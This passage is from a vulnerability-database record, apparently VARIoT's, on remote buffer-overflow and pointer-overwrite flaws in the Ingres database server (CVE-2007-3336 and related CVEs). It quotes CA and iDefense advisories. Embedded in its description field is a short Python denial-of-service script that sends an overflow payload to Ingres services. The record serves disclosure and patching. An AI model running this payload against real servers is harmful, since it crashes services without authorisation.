"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3336",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-3336",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3336",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-3336",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-389",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \nTitle: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed \nIngres Multiple Vulnerabilities\n\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\n\nCA Advisory Date: 2007-06-21\n\nReported By: NGSSoftware, and iDefense\n\nImpact: Attackers can potentially execute arbitrary code, or \noverwrite files. CA has issued fixes, to address all of \nthese vulnerabilities, for all supported CA products that may be \naffected. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. \n\n6) Communication server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the communications server (iigcc.exe). This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. \n\n7) Data Access/JDBC server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the Data Access server (iigcd.exe) in r3 or the JDCB \nserver in older releases. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3336"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3336",
"trust": 2.9
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37486",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES UNAUTHENTICATED POINTER OVERWRITE 1",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20070625 INGRES UNAUTHENTICATED POINTER OVERWRITE 2",
"trust": 0.6
},
{
"db": "XF",
"id": "34993",
"trust": 0.6
},
{
"db": "XF",
"id": "35000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"id": "VAR-200706-0397",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:57:36.859000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Ingres Security Alert",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 1.9,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.6,
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37486"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3336"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/35000"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34993"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/472193/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"date": "2007-06-22T18:30:00",
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004027"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-389"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-3336"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Used in products Ingres database server Vulnerable to arbitrary code execution",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004027"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-389"
}
],
"trust": 0.9
}
}
VAR-200808-0315
Vulnerability from variot - Updated: 2025-04-10 22:56Stack-based buffer overflow in the libbecompat library in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges by setting a long value of an environment variable before running (1) verifydb, (2) iimerge, or (3) csreport. Ingres Database is prone to multiple local vulnerabilities: - Multiple local privilege-escalation vulnerabilities - A vulnerability that may allow attackers to overwrite arbitrary files. Local attackers can exploit these issues to gain elevated privileges on the affected computer, execute arbitrary code with superuser privileges, and overwrite arbitrary files owned by 'Ingres' user. iDefense Security Advisory 08.01.08 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 01, 2008
I. BACKGROUND
Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service use thes Ingres Database server. More information can be found on the vendor's website at the following URL.
http://ingres.com/downloads/prod-cert-download.php
II.
The vulnerability exists within the "libbecompat" library that is used by several of the set-uid "ingres" utilities included with Ingres. When copying a user supplied environment variable into a fixed-size stack buffer, the library fails to check the length of the source string.
III. By itself, this vulnerability does not have very serious consequences.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected.
V. WORKAROUND
iDefense is currently unaware of any workaround for this issue.
VI. VENDOR RESPONSE
"This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6."
For more information, refer to Ingres' advisory at the following URL.
http://www.ingres.com/support/security-alert-080108.php
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3389 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
07/20/2007 Initial vendor response 07/23/2007 Initial vendor notification 08/01/2008 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2008 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Title: CA Products That Embed Ingres Multiple Vulnerabilities
CA Advisory Date: 2008-08-01
Reported By: iDefense Labs
Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition.
Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation. The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to potentially set the user and/or group ownership of a verifydb log file to be Ingres allowing read/write permissions to both. The third vulnerability, CVE-2008-3389, allows an unauthenticated attacker to obtain ingres user privileges. However, when combined with the unsecured directory privileges vulnerability (CVE–2008-3357), root privileges can be obtained.
Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation.
Severity: CA has given these vulnerabilities a High risk rating.
Affected Products: Admin r8.1 SP2 Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3 CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 CleverPath Aion BPM r10.1, r10.2 EEM 8.1, 8.2, 8.2.1 eTrust Audit/SCC 8.0 sp2 Identity Manager r12 NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11 Unicenter Asset Management r11.1, r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r2.2, r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2 Unicenter Software Delivery r11.1, r11.2 Unicenter Workload Control Center r11
Affected Platforms: 1. Ingres verifydb file create permission override (CVE-2008-3356) This vulnerability impacts all platforms except Windows. 2. Ingres un-secure directory privileges with utility ingvalidpw (CVE - 2008-3357) This vulnerability impacts only Linux and HP platforms. 3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389) This vulnerability impacts only Linux and HP platforms.
Status and Recommendation: The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3
Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information.
For these products: Admin r8.1 SP2 CA ARCserve Backup for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11
Apply the update below that is listed for your platform (note that URLs may wrap):
AIX [3.0.3 (r64.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z
HP-UX Itanium [3.0.3 (i64.hpu/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z
HP-UX RISC [3.0.3 (hp2.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z
